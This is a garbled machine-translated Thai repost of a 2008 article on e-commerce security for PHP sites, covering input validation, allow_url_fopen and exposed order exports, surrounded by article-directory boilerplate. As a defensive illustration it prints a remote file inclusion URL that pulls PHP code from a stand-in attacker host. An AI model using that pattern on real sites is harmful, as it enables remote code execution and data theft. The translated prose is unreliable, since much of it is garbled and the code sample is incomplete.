E-Commerce Security - Plugging หลุม Security | Article อีคอมเมิร์ซ

"อีคอมเมิร์ซ" Article
Home Article Directory

ทุกหมวดหมู่

Internet และ E-Business

อีคอมเมิร์ซ

E-Commerce Security - Plugging หลุม Security โดยผู้เชี่ยวชาญผู้แต่ง: Paul โรเบิต \| Article บทคัดย่อ
คำนับ: Views \| 520 คำ: 155 ดู (s)

ความปลอดภัยในเว็บไซต์ e-commerce ต้องมีการพิจารณาที่สำคัญเมื่อพัฒนาเว็บไซต์ e-commerce หรือซอฟต์แวร์. นักพัฒนาต้องมีการตระหนักถึงความปลอดภัยทุกการพิจารณาเมื่อออกแบบเว็บไซต์. กับ e-commerce เป็นธรรมดามากกว่าวันนี้จำนวนการโจมตีความปลอดภัยจะเพิ่มขึ้นอย่างแน่นอน. Paranoia เป็นสิ่งสุขภาพสำหรับนักพัฒนาเว็บไซต์ e-commerce เราต้องให้ถึงประตูที่มีปัญหาด้านความปลอดภัยและการรักษาหูและตาของเราเปิด. แม้ว่า loopholes ต่อไปนี้เป็นอย่างนั้น loopholes ต่อไปนี้ถ้าปัจจุบันมีการแก้ไขได้อย่างง่ายดาย.

ด้านล่างมีบางข้อพิจารณาความปลอดภัยจะรวมเมื่อพัฒนาเว็บไซต์. บทความนี้ไม่ครอบคลุม e-shoplifting โปรดดูบทความแยกของฉันบนนี้.

เข้าใช้ - ใส่ทุกไม่ว่าจะเป็นป้อนปริมาณให้การค้นหาสินค้าให้ป้อนชื่อ etc, ต้องมีการตรวจสอบสำหรับตัวที่น่าสงสัย. หากไม่ทำก็เป็นไปได้ป้อน "?>", ปิดแท็กสิ้น PHP และรันโค้ดบาง PHP.

มันไกลปลอดภัยให้ตัวเลขและตัวอักษร az (เมืองรวม) และ 0-9 และไม่มีอะไรอื่นมากกว่าทำรายการทุกตัวที่ไม่ควรจะมี. สคริปต์ตรวจสอบความต้องการเพื่อเลื่อนผ่านตัวอักษรแต่ละตัว. นี้ต้องมีความสามารถใช้ในการตรวจสอบด้านเซิร์ฟเวอร์ไม่ Javascript. เซิร์ฟเวอร์ด้านการตรวจสอบเข้าใช้เป็นสิ่งสำคัญที่จะทำให้ตัวอักษรที่ไม่ต้องการออก

มีอีกที่สำคัญเมื่อรันรหัสแล้ว PHP. ใช้ PHP เมื่อมีการเรียก allow_url_fopen ที่ช่วยให้เปิดไฟล์จากสคริปต์ PHP. การตั้งค่านี้ควรจะปิดจนกว่าจำเป็นอย่าง.

แค่คิดคุณมีสคริปต์ PHP สำหรับการแก้ไขส่วนหัวและ footers และเข้าถึงหน้าเว็บของคุณคุณจะพิมพ์ใน http://www.mysite.com/index.php?page=page2. ทั้งหมดก็จะเป็นผู้ใช้ที่เป็นอันตรายรันสคริปต์โดยการแก้ไขพารามิเตอร์เหล่านี้โดยการพิมพ์ใน "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" กับบางโค้ด PHP ในไฟล์ hacker.txt "". คุณสามารถมีสิ่งที่เกิดขึ้น, PHP อ่านไฟล์ที่ถูกลบข้อมูลสำคัญถูกขโมย.

หากคุณไม่แน่ใจว่าการตั้งค่านี้จะอยู่ในหรือนอกกรุณาคัดลอกโค้ด PHP ต่อไปนี้ในแฟ้มข้อความและอัปโหลดไปยังเว็บเซิร์ฟเวอร์ของคุณ:

phpinfo ();
?>

เมื่อคุณเข้าใช้สคริปต์บนเว็บเซิร์ฟเวอร์ของคุณคุณจะเจอ allow_url_fopen ตั้งค่าตามค่า.

ผู้ใช้คอมพิวเตอร์ภายใต้สถานการณ์ปกติไม่สามารถหาค่าของการตั้งค่านี้.

ระวังของข้อมูลส่งออกต้องการสั่งซื้อผลิตภัณฑ์ใน CSV และไฟล์ MySQL. หากข้อมูลนี้ออกจากสคริปต์และเก็บไว้ในเว็บเซิร์ฟเวอร์ภายใต้ชื่อไฟล์เช่นกัน. http://www.mysite.com/admin/output_tables.csv. นี้เป็นเพียงจริงๆปัญหาเมื่อข้อมูลส่งออกอยู่ในแฟ้มในไดเรกทอรีที่สาธารณชนสามารถเข้าถึง. มีสองวิธีเพื่อป้องกันการหนีความปลอดภัยนี้ - First มีไฟล์ออกหลังรหัสผ่านป้องกันไดเรกทอรีสองมีข้อมูลที่อยู่ภายในองค์ประกอบ HTML รูปแบบ textarea ในสคริปต์. Storeowner ก็สามารถคัดลอกข้อมูลจาก textfile นี้และสร้างไฟล์ใหม่ในเครื่องคอมพิวเตอร์ของพวกเขาและวางข้อมูลที่นี่.

ทั้งหมดมันจะเป็นแฮกเกอร์เพื่อหาชื่อไฟล์นี้โดยการตรวจสอบข้อมูลในเว็บไซต์ e-commerce สาธิตซอฟต์แวร์และมองหาชื่อไฟล์เดียวกันในเว็บไซต์ของจริง.

เกี่ยวกับผู้เขียน / ผู้แต่งไบโอ

โรเบิต Paul
ผมทำงานเป็นบริษัทพัฒนาซอฟต์แวร์ specialising ใน E-Commerce, เพิ่มประสิทธิภาพกลไกค้นหาและซอฟต์แวร์พิมพ์ประมาณการ เรียกว่า ROBO Solutions Design. ฉันยังพัฒนา นิวซีแลนด์ E-Commerce Solutions และซอฟต์แวร์ ภายใต้ชื่อ ROBO Design.

Article Source: http://www.th.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Tags: e-commerce, ecommerce, security, loophole, loopholes, plugging, secure, validation

Article Submitted: 2008-06-05 | This Article has been viewed 155 times.

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video Learn About คอมพิวเตอร์ Secure	เล่นวิดีโอ วิธีการใช้คอมพิวเตอร์ของคุณปลอดภัย	เล่นวิดีโอ วิธีการตรวจสอบความปลอดภัยการตั้งค่าใน Windows Vista

เพิ่มเติม "อีคอมเมิร์ซ" บทความที่เกี่ยวข้อง

ด้านล่างเอกสารเพิ่มเติมที่เกี่ยวข้องกับข้างต้นบทความจากหมวด "อีคอมเมิร์ซบทความ" เป็น.

ผู้ที่สนใจในบทความข้างต้น "E-Commerce Security - Plugging Security หลุม" ยังสนใจในบทความที่เกี่ยวข้องที่ปรากฏด้านล่าง:

ใช้ประโยชน์สูงสุดจากธุรกิจอีคอมเมิร์ซของคุณ

ทำงานธุรกิจ e-commerce ไม่เพียงเกี่ยวกับการรักษาเว็บไซต์ของคุณและทำงาน. ลูกค้าพึ่งพาความสามารถในการให้บริการแก่พวกเขาผ่านทางโทรศัพท์โทรสารอีเมล์หรือวิธีการอื่นและจะต้องใช้ทั้งหมดของระบบของคุณจะทำงานเพื่อให้สามารถปฏิบัติคำขอลูกค้า.

ใน E-Commerce

เพียงไม่กี่วันหลังฉันมีสนทนากับเพื่อนของฉัน. เขาเป็นเด็กฉลองวันเกิดของเขาที่ 1 และได้ทำงานระหว่างแม่ของเขาใน Kerala และเจนไนสถานที่ทำงานของเขา. เขาและภรรยาของเขาเดินทางระหว่างสถานที่เหล่านี้อย่างน้อย 4 ครั้งในเดือนสุดท้าย.

Salehoo หรือทั่วโลกรู้จัก?

ถ้าคุณได้รับการทำอีคอมเมิร์ซสำหรับระยะเวลาที่คุณจะได้ทราบว่ามี scamers กว่าแท้ให้บริการไดเรกทอรี dropship ขายส่ง. ในโลกของ e-ธุรกิจ Salehoo และทั่วโลกรู้จักทั้งให้บริการที่มีชื่อเสียงที่ได้รับความนิยมในหลายปีที่ผ่านมาเป็น.

Salehoo - การค้าส่งและเชื่อถือได้วางเรือ Recource

ถ้าคุณเคยจำหน่ายออนไลน์คุณอาจเคยได้ยินแล้วเกี่ยวกับ Salehoo หรือแม้กระทั่งใช้เพื่อประโยชน์ของ. หากคุณเพิ่งเริ่มออกกับธุรกิจของคุณคุณอาจจะสับสนกับผสม Salehoo วิจารณ์ออกมี. ขณะนี้แจ้งให้เราตรวจสอบสิ่งที่ Salehoo เป็นจริงเกี่ยวกับบริการที่พวกเขาให้มากซึ่งมักจะมองข้าม.

Mall อีคอมเมิร์ซ World's New Online Shopping

ว่าคนจำนวนมากไม่ทราบว่าซื้อออนไลน์อะไร? ถ้าต้องการฉันของคุณค่อนข้างน้อยหนึ่งที่ทำไมอีคอมเมิร์ซเป็นห้างสรรพสินค้าโลกใหม่ออนไลน์. แต่ทำงานร้านค้าปลีกออนไลน์เหล่านี้ใครคนเช่นคุณและฉันที่ทำไมธุรกิจนี้ booming และจะยังคงเสียงดังในขณะนี้และดีในอนาคต.

ประโยชน์จากการวางส่ง Electronics Services

ถ้าคุณเป็นแฟนใหญ่ของผลิตภัณฑ์อิเล็กทรอนิกส์ล่าสุดคุณอาจ tempted โดยแนวคิดของการทำงานอิเล็กทรอนิกส์ธุรกิจออนไลน์ของคุณเอง. ไม่ว่าฮาร์ดดิสก์เพื่อเริ่มต้นเมื่อคุณใช้ประโยชน์เต็มวางขวาจัดส่งบริการอิเล็กทรอนิกส์และมีมากมายให้คุณเลือกจาก.

ประโยชน์ในการเป็นเจ้าของร้านค้าออนไลน์ของคุณเอง Store

คุณเคยเข้าร้านสะดวกซื้อของท้องถิ่นและสงสัยว่ามันจะเป็นเช่นหากคุณเป็นเจ้าของหรือไม่คุณอยากเป็นเจ้าของที่ดีจะมีคนที่ชอบคุณหรือไม่ดีบทความนี้จะแสดงประโยชน์ของตัวเองเป็นเจ้าของร้านค้าปลีกออนไลน์ของคุณหรือที่รู้จักกันทั่วไปเช่น อีคอมเมิร์ซที่แตกต่างจากร้านสะดวกซื้อในพื้นที่จริง.

Home Article Directory

ทุกหมวดหมู่

Internet และ E-Business

อีคอมเมิร์ซ

�

ไม่พบสิ่งที่คุณกำลังมองหา? ลอง Google Search!

(เราบริการทั่วโลก - สถานที่ปรับปรุงณวันที่พุธธันวาคม 16, 2009 05:31, สิงคโปร์)

สหรัฐอเมริกา, USA. สหราชอาณาจักรอังกฤษ (อังกฤษสกอตแลนด์เวลส์, ไอร์แลนด์เหนือ). Canada. อัฟกานิสถาน. แอลเบเนีย. แอลจีเรีย. อเมริกันซามัว. Andorra. แองโกลา. แองกวิลลา. แอนตาร์กติกา. แอนติกาและบาร์บูดา. อาร์เจนตินา. อาร์เมเนีย. อารูบา. ออสเตรเลีย. ออสเตรีย. อาเซอร์ไบจาน. บาฮามาส. บาห์เรน. บังคลาเทศ. บาร์เบโดส. เบลารุส. เบลเยี่ยม. เบลีซ. เบนิน. เบอร์มิวดา. ภูฏาน. โบลิเวีย. Bonaire. มณฑลบอสเนีย-Herzegovina. บอตสวานา. บราซิล. หมู่เกาะบริติชเวอร์จิน. บรูไน Darrusalam. Bulgaria. บูร์กินาฟาโซ. บุรุนดี. กัมพูชา. แคเมอรูน. เคปเวิร์ด. หมู่เกาะเคย์แมน. สาธารณรัฐแอฟริกากลาง. ชาด. เกาะ Channel. Chile. จีน. เกาะคริสต์มาส. Colombia. คอโมโรส. คองโก. คองโก (Dem. Rep.). หมู่เกาะคุก. คอสตาริกา. โกตดิวัวร์. โครเอเชีย. คิวบา. Curacao. ไซปรัส. สาธารณรัฐเช็ก. Denmark. จิบูตี. โดมินิกา. สาธารณรัฐโดมินิกัน. ติมอร์ตะวันออก. เอกวาดอร์. อียิปต์. เอลซัลวาดอร์. แถบเส้นศูนย์สูตรกินี. เอริเทรี. เอสโตเนีย. เอธิโอเปีย. หมู่เกาะฟอล์คแลนด์และ Dependencies. หมู่เกาะแฟโร. ฟิจิ. ฟินแลนด์. ฝรั่งเศส. กิอานาฝรั่งเศส. ยฝรั่งเศส. กาบอง. แกมเบีย. กาซา. จอร์เจีย. Germany. กานา. ยิบริบตาร์. กรีซ. กรีนแลนด์. เกรเนดา. Guadeloupe. กวม. กัวเตมาลา. กินี. กินีบิสเซา. กายอานา. ไฮติ. หมู่เกาะฮาวาย. ฮอนดูรัส. ฮ่องกง. ฮังการี. ไอซ์แลนด์. อินเดีย. อินโดนีเซีย. อิหร่าน. อิรัก. เกาะแมน. อิสราเอล. อิตาลี. Coast งาช้าง. จาเมกา. Japan. จอห์นสตันเกาะปะการัง. จอร์แดน. คาซัคสถาน. เคนยา. คิริบาส. เกาหลี (ภาคเหนือ). เกาหลี (ใต้). คูเวต. Kyrgyzstan. ลาว. ลัตเวีย. เลบานอน. หมู่เกาะลีเวิร์ด. เลโซโท. ไลบีเรีย. ลิเบีย. Liechtenstein. ลิทัวเนีย. ลักเซมเบิร์ก. Macau. มาซิโดเนีย. มาดากัสการ์. มาลาวี. มาเลเซีย. มัลดีฟส์. มาลี. มอลตา. หมู่เกาะมาร์แชลล์. มาร์ตินีก. มอริเตเนีย. มอริเชียส. เม็กซิโก. ไมโครนีเซีย (Federated States). หมู่เกาะมิดเวย์. มอลโดวา. โมนาโก. มองโกเลีย. มอนต์เซอร์รัต. โมร็อกโก. ชายฝั่งยุง. โมซัมบิก. พม่า (พม่า). นามิเบีย. นาอูรู. เกาะนาวาสซา. เนปาล. เนเธอร์แลนด์. Antilles Netherlands. สกอตแลนด์ New. New Zealand. นิการากัว. ไนเจอร์. ไนจีเรีย. Niue. Norfolk Island. Northern Mariana Islands. นอร์เวย์. โอมาน. ปากีสถาน. ปาเลา. ปาเลสไตน์. ปานามา. ปาปัวนิวกินี. Paracel Islands. ปารากวัย. เปรู. ฟิลิปปินส์. เกาะพิตแคร์น. โปแลนด์. โปรตุเกส. เปอร์โตริโก. กาตาร์. รวมตัวใหม่. โรมาเนีย. รัสเซีย. รวันดา. Ryukyu เกาะ. เซนต์เฮเลนา. เซนต์คิตส์และเนวิส. เซนต์ลูเซีย. Saint Pierre และมีเกอลง. เซนต์วินเซนต์และเกรนาดี. ซามัว. ซานมารีโน. เซาโตเมและปรินซิปี. ซาอุดีอาระเบีย. เซเนกัล. เซอร์เบีย. เซเชลส์. เซียร์ราลีโอน. Singapore. สโลวาเกีย. สโลวีเนีย. หมู่เกาะโซโลมอน. โซมาเลีย. South Africa. สเปน. ศรีลังกา. ซูดาน. ซูรินาเม. สวาซิแลนด์. สวีเดน. วิตเซอร์แลนด์. ซีเรีย. ไต้หวัน. ทาจิกิสถาน. แทนซาเนีย. Thailand. โตโก. ตองกา. Transkei. ตรินิแดดและโตเบโก. ตูนิเซีย. ตุรกี. เติร์กเมนิสถาน. เติและ Caicos เกาะ. ตูวาลู. หมู่เกาะเวอร์จินของสหรัฐอเมริกา. ยูกันดา. ยูเครน. United Emirates อาหรับ. Upper Volta. อุรุกวัย. Uzbekistan. วานูอาตู. วาติกัน City (ศักดิ์สิทธิ์ดู). เวเนซุเอลา. เวียดนาม. ปลุก Island. หมู่เกาะวินวาร์ด. เยเมน. ยูโกสลาเวีย. ซาอีร์. แซมเบีย. ซิมบับเว

Copyright © 2005 -- โดย Larry ลิม, Singapore - Article Search Engine Directory ที่ ArticleSphere.com ™
ทั้งหมด Worldwide Rights Reserved. ทั้งหมดเครื่องหมายการค้าและ Servicemarks เป็นทรัพย์สินของเจ้าของตามที่.